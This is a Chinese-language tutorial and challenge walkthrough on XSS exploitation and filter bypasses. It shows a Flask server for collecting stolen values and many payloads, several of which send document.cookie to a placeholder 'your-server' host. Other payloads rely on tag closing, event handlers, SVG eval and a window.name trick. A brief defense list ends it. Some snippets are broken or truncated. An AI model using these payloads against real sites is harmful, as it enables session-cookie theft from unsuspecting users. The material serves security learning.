XSS漏洞实战与绕过技巧全面解析<\/h1>

0X00 XSS基础概念<\/h2>

XSS（Cross-Site Scripting）跨站脚本攻击是一种常见的Web安全漏洞，攻击者能够在受害者的浏览器中执行恶意脚本。根据攻击方式不同，XSS可分为：<\/p>

反射型XSS：恶意脚本来自当前HTTP请求<\/li>
存储型XSS：恶意脚本存储在服务器上<\/li>

DOM型XSS：漏洞存在于客户端代码而非服务器端<\/li> <\/ol>

0X01 XSS挑战环境搭建<\/h2>

基础接收服务器配置<\/h3>

使用Python Flask搭建接收服务器时需注意：<\/p>

from<\/span> flask import<\/span> Flask, request
<\/span><\/span>
<\/span><\/span>xss =<\/span> Flask(__name__)
<\/span><\/span>
<\/span><\/span>@xss<\/span>.<\/span>route('\/'<\/span>)
<\/span><\/span>def<\/span> index<\/span>():
<\/span><\/span>    flag =<\/span> request.<\/span>args
<\/span><\/span>    for<\/span> i,j in<\/span> flag.<\/span>items():
<\/span><\/span>        print('Flag is:'<\/span> +<\/span> j)
<\/span><\/span>    return<\/span> str()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    xss.<\/span>run(host=<\/span>"0.0.0.0"<\/span>)  # 关键：允许外网访问<\/span>
<\/span><\/span><\/code><\/pre>0X02 XSS挑战关卡详解<\/h2>
基础关卡绕过<\/h3>
基本payload结构<\/strong>：<\/p>
http:\/\/目标域名\/?location="http:\/\/你的服务器\/?"+document.cookie
<\/code><\/pre>
关键点<\/strong>：<\/p>

使用location<\/code>参数传递恶意脚本<\/li>
document.cookie<\/code>获取当前域cookie<\/li>
+<\/code>号需URL编码为%2B<\/code>，否则会被服务器吃掉<\/li>
<\/ul>
常见HTML标签闭合技巧<\/h3>

a标签闭合<\/strong>：<\/li>
<\/ol>
q=a%27><\/a<\/span>><script<\/span>>alert<\/span>(3<\/span>);<\/script<\/span>>\/\/
<\/span><\/span><\/code><\/pre>
textarea闭合<\/strong>：<\/li>
<\/ol>
q=<\/textarea<\/span>><script<\/span>>location<\/span>.href<\/span>=<\/span>'http:\/\/your-server\/?'<\/span>%<\/span>2<\/span>Bdocument<\/span>.cookie<\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>
input标签利用<\/strong>：<\/li>
<\/ol>
q=1" autofocus onfocus=alert(1);\/\/
<\/span><\/span><\/code><\/pre>autofocus<\/code>属性使元素自动获取焦点，触发onfocus<\/code>事件<\/p>
特殊场景绕过<\/h3>

双引号被过滤<\/strong>：<\/li>
<\/ol>
q=1%20%27%20autofocus%20onfocus=location.href=%27http:\/\/your-server\/?%27%2Bdocument.cookie;\/\/
<\/span><\/span><\/code><\/pre>
单引号被过滤<\/strong>（使用反引号）：<\/li>
<\/ol>
q=``%20autofocus%20onfocus=location.href=`http:\/\/your-server\/?`%2Bdocument.cookie
<\/span><\/span><\/code><\/pre>
frame标签利用<\/strong>：<\/li>
<\/ol>
q=javascript:location.href=`http:\/\/your-server\/?`%2Bdocument.cookie
<\/span><\/span><\/code><\/pre>高级绕过技术<\/h3>

SVG标签绕过黑名单<\/strong>：<\/li>
<\/ol>
q=11<svg<\/span>\/<\/span>onload<\/span>=<\/span>"eval(String.fromCharCode(106,97,118,...))"<\/span>>
<\/span><\/span><\/code><\/pre>
CSP绕过<\/strong>：

当存在CSP限制如：<\/li>
<\/ol>
Content-Security-Policy: script-src 'self' 'sha256-...'
<\/code><\/pre>
可通过同源策略和document.domain<\/code>设置绕过：<\/p>
q=\/\/allowed-domain.knock.xss.moe\/?document.domain="knock.xss.moe";window.open(http:\/\/your-server)
<\/span><\/span><\/code><\/pre>
字符编码绕过<\/strong>：<\/li>
<\/ol>

<\/span><\/span><\/code><\/pre>
点号被过滤<\/strong>（使用数组表示法）：<\/li>
<\/ol>
window['open'<\/span>]('http:\/\/ip2long:port?'<\/span>%<\/span>2<\/span>Bdocument<\/span>['cookie'<\/span>])
<\/span><\/span><\/code><\/pre>特殊场景解决方案<\/h3>

长度限制绕过<\/strong>：<\/li>
<\/ol>

使用短域名服务<\/li>
搭建外部页面利用window.name<\/code>传递payload：<\/li>
<\/ul>
<script<\/span>>
<\/span><\/span>windo<\/span>.name<\/span> =<\/span> "location.href='http:\/\/your-server\/?'+document.cookie"<\/span>;
<\/span><\/span>location<\/span>.href<\/span> =<\/span> "http:\/\/target\/?q=<svg\/onload=eval(name)>"<\/span>;
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>

全大写过滤绕过<\/strong>：

使用HTML实体编码所有字符<\/p>
<\/li>

script标签过滤<\/strong>：<\/p>
<\/li>
<\/ol>

双写绕过：<scriscriptpt><\/code><\/li>
大小写混合：<Script><\/code><\/li>
<\/ul>
0X03 防御措施<\/h2>

输入过滤与输出编码<\/li>
设置HttpOnly标志<\/li>
实施CSP策略<\/li>
使用X-XSS-Protection头<\/li>
避免使用eval()<\/code>等危险函数<\/li>
<\/ol>
0X04 总结<\/h2>
本教程涵盖了从基础到高级的XSS绕过技术，包括：<\/p>

多种HTML标签闭合技巧<\/li>
事件处理器利用<\/li>
字符编码绕过<\/li>
CSP策略绕过<\/li>
长度限制解决方案<\/li>
各种过滤规则的绕过方法<\/li>
<\/ul>
这些技术展示了XSS攻击的多样性和灵活性，也强调了全面防御策略的重要性。实际应用中应根据具体场景选择合适的绕过方法，同时作为防御方也应考虑多种攻击向量，实施纵深防御。<\/p>